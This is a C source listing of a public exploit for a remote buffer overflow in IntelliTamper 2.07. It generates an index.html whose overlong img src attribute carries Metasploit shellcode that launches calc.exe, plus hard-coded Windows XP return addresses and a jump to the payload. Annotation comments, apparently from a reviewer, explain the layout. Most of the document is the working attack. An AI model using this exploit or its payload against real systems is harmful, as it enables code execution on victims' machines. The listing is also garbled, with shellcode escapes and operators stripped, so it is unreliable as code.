IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
发布时间:2016-12-21 来源:查字典编辑

/*

* IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

*

* Discovered & Written by r0ut3r (writ3r [at] gmail.com)

* Many Thanks to Luigi Auriemma (http://aluigi.org)

*

* Greets to shinnai (http://www.shinnai.net)

* and Guido Landi

*

* IntelliTamper contains a remote buffer overflow vulnerability.

* The HTML parser, more precisely its handling of the image tag, fails to perform

* boundary checks on supplied data.

*

* kit:/home/r0ut3r/public_html/imgsrc-xpl # gcc -o yahh yahh.c

* kit:/home/r0ut3r/public_html/imgsrc-xpl # ./yahh 0

* [!] OS: Microsoft Windows XP Pro SP 2

* [ ] Building payload

* [ ] Inserting JMP code

* [ ] Success writing to index.html

* kit:/home/r0ut3r/public_html/imgsrc-xpl #

*/ #include <stdio.h>

#include <stdlib.h>

#include <string.h> /* win32_exec - EXITFUNC=thread CMD=c:windowssystem32calc.exe Size=184

Encoder=PexFnstenvSub http://metasploit.com

Filtered characters: 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e */

/*
 * Payload bytes that main() copies into the generated page right after the
 * "http://" prefix. The comment above this array labels them as an encoded
 * Metasploit win32_exec payload (CMD = calc.exe, Size=184) with the bytes
 * 0x00 0x22 0x09 0x0a 0x0d 0x3c 0x3e filtered out -- presumably because
 * they would end the string, the attribute or the tag.
 * NOTE(review): as printed on this page the literal holds plain "xNN" text;
 * the escape characters appear to have been lost in extraction.
 */
unsigned char shellcode[] =

"x31xc9x83xe9xd8xd9xeexd9x74x24xf4x5bx81x73x13x99"

"xebx8dx6ax83xebxfcxe2xf4x65x03xc9x6ax99xebx06x2f"

"xa5x60xf1x6fxe1xeax62xe1xd6xf3x06x35xb9xeax66x23"

"x12xdfx06x6bx77xdax4dxf3x35x6fx4dx1ex9ex2ax47x67"

"x98x29x66x9exa2xbfxa9x6execx0ex06x35xbdxeax66x0c"

"x12xe7xc6xe1xc6xf7x8cx81x12xf7x06x6bx72x62xd1x4e"

"x9dx28xbcxaaxfdx60xcdx5ax1cx2bxf5x66x12xabx81xe1"

"xe9xf7x20xe1xf1xe3x66x63x12x6bx3dx6ax99xebx06x02"

"xa5xb4xbcx9cxf9xbdx04x92x1ax2bxf6x3axf1x04x43x8a"

"xf9x83x15x94x13xe5xdax95x7ex88xb7x36xeex82xe3x0e"

"xf6x9cxfex36xeax92xfex1exfcx86xbex58xc5x88xecx06"

"xfaxc5xe8x12xfcxebx8dx6a"; #define JMP 0xe9 //JMP int main(int argc, char* argv[])
/*
 * Generator entry point: builds a single <img> tag in buff and writes it to
 * index.html in the current directory. argv[1] selects a row of targets[].
 * Returns 1 when the argument is missing or index.html cannot be opened,
 * otherwise 0 (also when the final close is reported as failed).
 * NOTE(review): the listing is damaged by extraction (operators and string
 * escapes are missing), so it does not build as shown.
 */

{

FILE *fd;

/* Fixed 4000-byte staging buffer; nothing below checks p against its end. */
unsigned char buff[4000],

*jmpref,

*p;

/*
 * opt has no initializer; it is only assigned inside the switch below.
 * targets[] holds one entry per supported system: an OS label and a
 * hard-coded 32-bit address (field eip) that is later stored into the page
 * after the filler bytes.
 */
int opt; struct

{

char *os;

unsigned int eip;

} targets[] =

{

"Microsoft Windows XP Pro SP 2",

0x7d040e1f, "Microsoft Windows XP Pro SP 3",

0x7c8369f0

}; if (argc < 2)

{

printf("---------------------------------------------------------n");

printf(" IntelliTamper 2.07 Remote Buffer Overflow Expoit nn"); printf(" Discovered & Written by r0ut3r (writ3r [at] gmail.com)n");

printf(" Thanks to Luigi Auriemma (http://aluigi.org)nn"); printf(" Usage: %s <OS-type>n", argv[0]);

printf(" 0: Microsoft Windows XP Pro SP2n");

printf(" 1: Microsoft Windows XP Pro SP3n");

printf("---------------------------------------------------------n");

return 1;

/*
 * NOTE(review): the switch below has no default case, so a numeric argument
 * other than 0 or 1 leaves opt uninitialized before it indexes targets[].
 */
} p = buff; switch (atoi(argv[1]))

{

case 0:

opt = 0;

printf("[!] OS: %sn", targets[0].os);

break; case 1:

opt = 1;

printf("[!] OS: %sn", targets[1].os);

break;

} printf("[ ] Building payloadn");

/*
 * Page layout produced from here on: the opening <img src= attribute with
 * an "http://" URL, the payload bytes, 'A' filler up to 3065 bytes counted
 * from jmpref, then the 4-byte address taken from targets[opt].
 * Defensive relevance: the header comment attributes the flaw to missing
 * boundary checks in IntelliTamper's image-tag parsing, so an img src value
 * of several thousand bytes is the artifact a content filter or a
 * crawler-side length check can reject.
 */
p = sprintf(p, "<img src="http://"); jmpref = p; p = sprintf(p, "%s", shellcode); int i;

int a = 3065 - (p - jmpref);

for (i=0; i < a; i )

*p = 'A'; *(unsigned int *) p = targets[opt].eip;

/*
 * After the address, a JMP opcode byte (0xe9) and a 32-bit displacement
 * computed from jmpref are stored, then the attribute and tag are closed.
 */
p = 4; printf("[ ] Inserting JMP coden"); *p = JMP;

*(unsigned int *) p = jmpref - (p 4); //JMP -(3065 4 5)

p = 4; p = sprintf(p, "">"); fd = fopen("index.html", "wb");

if (fd == NULL)

{

perror("[-] Failed opening index.htmln");

return 1;

/*
 * NOTE(review): fwrite's return value is ignored; the success message is
 * decided by fclose() alone.
 */
} fwrite(buff, 1, p - buff, fd);

if (fclose(fd) == 0)

printf("[ ] Success writing to index.htmln");

else

printf("[-] Failed writing to index.htmln"); return 0;

}
